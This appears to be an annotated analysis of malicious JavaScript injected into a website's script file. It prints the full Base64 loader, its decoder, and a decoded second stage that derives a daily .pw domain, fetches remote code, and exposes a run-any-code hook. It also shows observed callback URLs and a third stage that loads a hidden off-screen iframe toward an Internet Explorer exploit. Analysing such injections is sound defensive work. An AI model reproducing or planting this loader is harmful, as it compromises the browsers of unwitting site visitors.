- // JS script at www.askmen.com/includes/js/lib/geoAnalysis.js contains the following JS at the bottom:
- var s = document.createElement("SCR" + "IPT"); // Stage 1: builds a <script> element; the tag name is split into "SCR" + "IPT", so a plain string search for "SCRIPT" does not match this line
- s.text = b64dec("MzM4MjcxNjt2YXIgcXdxd3Fxd3Fxd3F3d3Fxd3d3cXFxcXc9J3FxcXFxcXF3d3d3cXdxcXFxcXd3d3F3d3cnO2Z1bmN0aW9uIGNyY1RhYmxlRygpe3ZhciBjO3ZhciBjcmNUYWJsZSA9IFtdO2Zvcih2YXIgbiA9MDsgbiA8IDI1NjsgbisrKXtjID0gbjtmb3IodmFyIGsgPTA7IGsgPCA4OyBrKyspe2MgPSAoKGMmMSkgPyAoMHhFREI4ODMyMCBeIChjID4+PiAxKSkgOiAoYyA+Pj4gMSkpO31jcmNUYWJsZVtuXSA9IGM7fXJldHVybiBjcmNUYWJsZTt9O2Z1bmN0aW9uIGNyYzMyKHN0cikge3ZhciBjcmNUYWJsZSA9IGNyY1RhYmxlRygpO3ZhciBjcmMgPSAwIF4gKC0xKTtmb3IgKHZhciBpID0gMDsgaSA8IHN0ci5sZW5ndGg7IGkrKyApIHtjcmMgPSAoY3JjID4+PiA4KSBeIGNyY1RhYmxlWyhjcmMgXiBzdHIuY2hhckNvZGVBdChpKSkgJiAweEZGXTt9cmV0dXJuIChjcmMgXiAoLTEpKSA+Pj4gMDt9O3ZhciBkID0gIi09LSI7dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBkYXRlU3RyID0gZGF0ZS5nZXRVVENGdWxsWWVhcigpICsgZCArIChkYXRlLmdldFVUQ01vbnRoKCkrMSkgKyBkICsgZGF0ZS5nZXRVVENEYXRlKCk7d2luZG93LmFybXA9ZnVuY3Rpb24ocCl7dmFyIHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdTQ1JJUFQnKTsgcy50ZXh0ID0gYjY0ZGVjKHApLnJlcGxhY2UoL1wwKy8sJycpOyBkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHMpO307dmFyIHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdTQ1JJUFQnKTtzLnNyYz0iaHR0cDovLyIgKyBjcmMzMihkYXRlU3RyKS50b1N0cmluZygxNikgKyAiLnB3L2JsZGUuaHRtbD8iK01hdGgucmFuZG9tKCk7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChzKTs=").replace(/\0+/, '');
- document.body.appendChild(s); // appending the element runs the Base64-decoded text assigned on the previous line as an inline script in the page's own origin; the replace() there strips the NUL that b64dec emits for the trailing "=" padding
- function b64dec(s) { // Hand-rolled Base64 decoder shipped with the injected code; takes a Base64 string and returns the decoded bytes as a string
- var e = {}, // e: lookup table, alphabet character -> 6-bit value
- i, k, v = [], // v: the 64 alphabet characters in index order (k is declared but never used)
- r = '', // r: decoded output, built up one character at a time
- w = String.fromCharCode;
- var n = [ // half-open character-code ranges that make up the standard Base64 alphabet
- [65, 91], // 'A'..'Z'
- [97, 123], // 'a'..'z'
- [48, 58], // '0'..'9'
- [43, 44], // '+'
- [47, 48] // '/'
- ];
- for (z in n) { // z is never declared in this function, so in sloppy mode it becomes a global variable
- for (i = n[z][0]; i < n[z][1]; i++) {
- v.push(w(i));
- }
- }
- for (i = 0; i < 64; i++) {
- e[v[i]] = i;
- }
- for (i = 0; i < s.length; i += 72) { // input is consumed in 72-character chunks (72 * 6 bits = 54 whole bytes), so resetting the accumulator per chunk loses no bits
- var b = 0, // b: bit accumulator
- c, x, l = 0, // l: number of not-yet-emitted bits held in b
- o = s.substring(i, i + 72);
- for (x = 0; x < o.length; x++) {
- c = e[o.charAt(x)]; // any character outside the alphabet, including "=" padding, looks up as undefined
- b = (b << 6) + c; // adding undefined turns b into NaN for the rest of the chunk
- l += 6;
- while (l >= 8) {
- r += w((b >>> (l -= 8)) % 256); // emit the next complete byte; NaN >>> n evaluates to 0, so padding comes out as NUL characters, which is why callers apply replace(/\0+/, '')
- }
- }
- }
- return r;
- }
- // When executed, the code above decodes and injects the second-stage JS shown below:
- var qwqwqqwqqwqwwqqwwwqqqqw = 'qqqqqqqwwwwqwqqqqqwwwqwww'; // junk-named string that nothing in the code shown here reads; its purpose (marker, filler) cannot be determined from this listing
- function crcTableG() { // Builds and returns the 256-entry lookup table for a table-driven CRC-32
- var c;
- var crcTable = [];
- for (var n = 0; n < 256; n++) {
- c = n;
- for (var k = 0; k < 8; k++) { // eight shift/XOR rounds, one per bit of the byte value n
- c = ((c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1)); // 0xEDB88320 is the reflected form of the standard CRC-32 polynomial
- }
- crcTable[n] = c;
- }
- return crcTable;
- };
- function crc32(str) { // Returns the CRC-32 of str as an unsigned 32-bit number; used below only to derive a hostname from the date string
- var crcTable = crcTableG(); // the table is rebuilt on every call
- var crc = 0 ^ (-1); // initial value: all 32 bits set
- for (var i = 0; i < str.length; i++) {
- crc = (crc >>> 8) ^ crcTable[(crc ^ str.charCodeAt(i)) & 0xFF]; // only the low 8 bits of each character code take part
- }
- return (crc ^ (-1)) >>> 0; // final inversion; >>> 0 converts the signed result to unsigned
- };
- var d = "-=-"; // separator placed between the date fields
- var date = new Date(); // the visitor's clock, read through the UTC getters below
- var dateStr = date.getUTCFullYear() + d + (date.getUTCMonth() + 1) + d + date.getUTCDate(); // "YEAR-=-MONTH-=-DAY" in UTC; month and day are not zero-padded
- window.armp = function (p) { // global hook: Base64-decodes its argument and runs the result as an inline script; presumably called by the script fetched from the generated URL - confirm against a captured response
- var s = document.createElement('SCRIPT');
- s.text = b64dec(p).replace(/\0+/, ''); // same decode-and-strip-NUL step as the first stage
- document.body.appendChild(s);
- };
- var s = document.createElement('SCRIPT'); // Stage 2 network step: loads an external script from a date-derived host
- s.src = "http://" + crc32(dateStr).toString(16) + ".pw/blde.html?" + Math.random(); // hostname = lowercase hex CRC-32 of dateStr under .pw (toString(16) does not zero-pad, so the label can be shorter than 8 characters); it depends only on the UTC date, so each day's domain can be precomputed for blocklists and log searches; the Math.random() query string is presumably a cache-buster; the fetch is plain HTTP
- document.body.appendChild(s); // appending the element triggers the request and runs whatever the host returns
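- // This JS generates one URL per UTC day (hostname = hex CRC-32 of the date string, under .pw). Observed URLs looked like these; note that the last two use /nbe.html rather than the /blde.html path in the code above: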
- http://55fd8fe0.pw/blde.html?0.5656226223404374
- http://22fabf76.pw/blde.html?0.3542296437611776
- http://be90becd.pw/nbe.html?0.5180308921262622
- http://9b66653c.pw/nbe.html?0.44849819945207525
- // These links deliver Base64-encoded JS (Base64 is an encoding, not encryption). Example, shown decoded:
- var ua = navigator.userAgent.toLowerCase(); // Stage 3: browser check followed by a hidden-iframe redirect
- if (ua.indexOf("msie") != -1 || ((ua.indexOf("trident") != -1) && (ua.indexOf("rv:11") != -1))) { // proceeds only for Internet Explorer user agents: "msie", or "trident" together with "rv:11"
- var d = document.createElement('div');
- var f = document.createElement('i' + 'fr' + 'ame'); // tag name "iframe" is assembled from fragments, so a plain string search for "iframe" does not match this line
- f.setAttribute('style', 'width:100px;height:100px;position:absolute;left:-10000px;top:0;'); // 100x100 frame positioned 10000px off-screen to the left, so the visitor does not see it
- f.setAttribute('src', 'http://ushbnasdahfjashdajsdhu.thenettyjostoryorhowilearnedtolovehollywoodland.com/?PHPSSESID=njrMNruDMhzIFIDALOXES7tHNErPThnJkpDZw-4|MzIxNmFjZTA1ZTRkMWI5YmQ0MDZhOTY2NjgyZjU0MWU'); // frame source is a remote host over plain HTTP; the query parameter is spelled "PHPSSESID", not the usual "PHPSESSID"
- d.appendChild(f);
- document.body.appendChild(d); // attaching the div to the DOM is what makes the browser load the frame
- }
- // This script, in turn, delivers exploit code. In my case it was an Internet Explorer VML exploit.